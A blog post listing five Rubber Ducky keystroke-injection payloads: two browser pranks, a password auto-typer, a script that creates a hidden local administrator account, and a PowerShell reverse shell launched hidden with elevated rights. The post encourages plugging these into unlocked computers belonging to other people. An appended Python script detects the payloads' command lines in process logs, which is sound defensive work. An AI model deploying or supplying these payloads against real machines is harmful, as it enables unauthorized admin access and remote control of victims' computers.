My 5 favorite things to do with a Rubber Ducky


Some people like to take a bath with their Rubber Ducky. I find that bathing with it tends to fry the board. The Rubber Ducky, or bad USB as people in the hacking and pen testing community call it, is used to mimic a USB keyboard and send keystrokes to a PC. What is awesome about the Rubber Ducky is that you can pre-program all of the keystrokes the device sends to the PC, making this tool a hacker’s best friend. You can simply walk up to a computer that is unlocked, stick this USB stick into a port and, boom, it will start sending whatever you tell it to. Let’s take a look at some of my favorite payloads.

1. The Windows 93 Prank

This one is fun and simple. Go to the site and press F11 to see what will happen.

DELAY 500
GUI r
DELAY 500
REM takes the user's computer to a fake windows93 site
STRING http://www.windows93.net/
ENTER
DELAY 500
REM f11 is triggered so it looks like a real desktop
F11
ENTER

2. Login to my PC

This is one I like to use to save 3 different passwords to help me log in to my PCs without having to type in passwords; I just plug in my Rubber Ducky.

REM Type Login
DELAY 1000
STRING password
ENTER
DELAY 100
ENTER
DELAY 1000
STRING different password
ENTER
DELAY 100
ENTER
DELAY 1000
STRING another password
ENTER

The Rubber Ducky is the name given to this bad USB by its creator at https://shop.hak5.org/. The tool is awesome, and they offer a lot more cool pen testing and hacking tools, along with community forums and pre-made payloads for the Duck. One of the tools you will need to use with the Duck is an encoder like the ducktoolkit, which allows you to take the code above and put it in the right payload form for the Ducky. This encoder is really easy to use and, best of all, it’s free.

3. Windows is updating hell

This one kills me as it will never end and the person waiting will be there for days lol.

REM fake update LUL
REM
REM let the ducky HID enumerate
DELAY 3000
GUI r
DELAY 500
STRING iexplore http://fakeupdate.net/win10u/index.html
ENTER
REM the target likely has a slow internet connection, so wait for the page to load
DELAY 4000
F11

4. Add Admin Account

Yes, that’s right: find someone with an unlocked PC and plug this one in to get an admin account set up with your credentials.

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Net User /ADD
ENTER
STRING Net LocalGroup Administrators /ADD
ENTER
DELAY 500
STRING reg add ‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList’ /v /t REG_DWORD /d 0 /f
ENTER

STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-58401.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58401.ps1
ENTER

5. Reverse shell

Reverse shell is simple and powerful. Think about it: what if you had 4 and 5 together? Now you will have remote access and an admin account on someone’s PC.

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
ENTER
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
ENTER

STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-34593.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
ENTER
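
Payloads 4 and 5 leave a recognizable trail in process-creation logs (Windows event 4688 with command-line auditing, or Sysmon event 1). As an added example, not code from the original post, this Python script matches the command lines those payloads type and alerts when several appear on one host within two minutes. The rule names, hostnames, account names and log tuples are constructed for illustration.

```python
import re
from collections import defaultdict

# Rule name -> regex over a process command line, drawn from payloads 4 and 5.
RULES = {
    "elevated_start_process": r'powershell.*start-process\s+\S+\s+-verb\s+runas',
    "local_user_added": r'\bnet1?(\.exe)?"?\s+user\b.*\s/add\b',
    "added_to_administrators": r'\bnet1?(\.exe)?"?\s+localgroup\s+administrators\b.*\s/add\b',
    "account_hidden_from_logon": r'\breg(\.exe)?"?\s+add\b.*winlogon\\specialaccounts\\userlist',
    "execution_policy_unrestricted": r'set-executionpolicy\s+\W*unrestricted',
    "hidden_powershell_script": r'powershell(\.exe)?"?\s.*-windowstyle\s+hidden\b.*\.ps1',
    "tiny_console_window": r'\bmode\s+con:\s*cols=\d+\s+lines=1\b',
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return {name for name, rx in COMPILED.items() if rx.search(cmdline)}

def find_bursts(events, window_s=120, min_rules=3):
    """Return {host: sorted rule names} for hosts where at least min_rules
    distinct rules fire within window_s seconds. A lone hit (an admin adding
    a user) is routine; several in a couple of minutes is typed-script speed."""
    hits = defaultdict(list)
    for ts, host, cmd in sorted(events):
        hits[host].extend((ts, rule) for rule in match_rules(cmd))
    alerts = {}
    for host, seq in hits.items():
        for start, _ in seq:
            rules = {r for ts, r in seq if start <= ts <= start + window_s}
            if len(rules) >= min_rules:
                alerts[host] = sorted(rules)
                break
    return alerts

# Constructed events: (epoch seconds, host, command line). Names are made up.
SAMPLE_EVENTS = [
    (1000, "WS-042", "powershell Start-Process cmd -Verb runAs"),
    (1003, "WS-042", "mode con:cols=14 lines=1"),
    (1006, "WS-042", "powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser"),
    (1009, "WS-042", r"powershell.exe -windowstyle hidden -File C:\Windows\config-58401.ps1"),
    (1011, "WS-042", r'"C:\Windows\system32\net.exe" user example_user /add'),
    (1012, "WS-042", "net localgroup administrators example_user /add"),
    (1013, "WS-042", r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
                     r'\Winlogon\SpecialAccounts\UserList" /v example_user /t REG_DWORD /d 0 /f'),
    (5000, "ADMIN-01", "net user svc_backup /add"),
    (50000, "ADMIN-01", "powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"),
    (90000, "ADMIN-01", "net localgroup administrators svc_backup /add"),
]

if __name__ == "__main__":
    for host, rules in find_bursts(SAMPLE_EVENTS).items():
        print(host, rules)
```

On the sample data only WS-042 is flagged; ADMIN-01 runs three of the same commands, but hours apart, so it stays below the burst threshold.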

There is so much more you can do with a Rubber Ducky, so we haven’t even scratched the surface with this list. If you find this as interesting as I do, then go pick one up at Hak5 and start having some fun. If you like tech and learning new things, then please check out our Phonlab Smartphone Tech Course today.

Please comment below

RootJunky

 
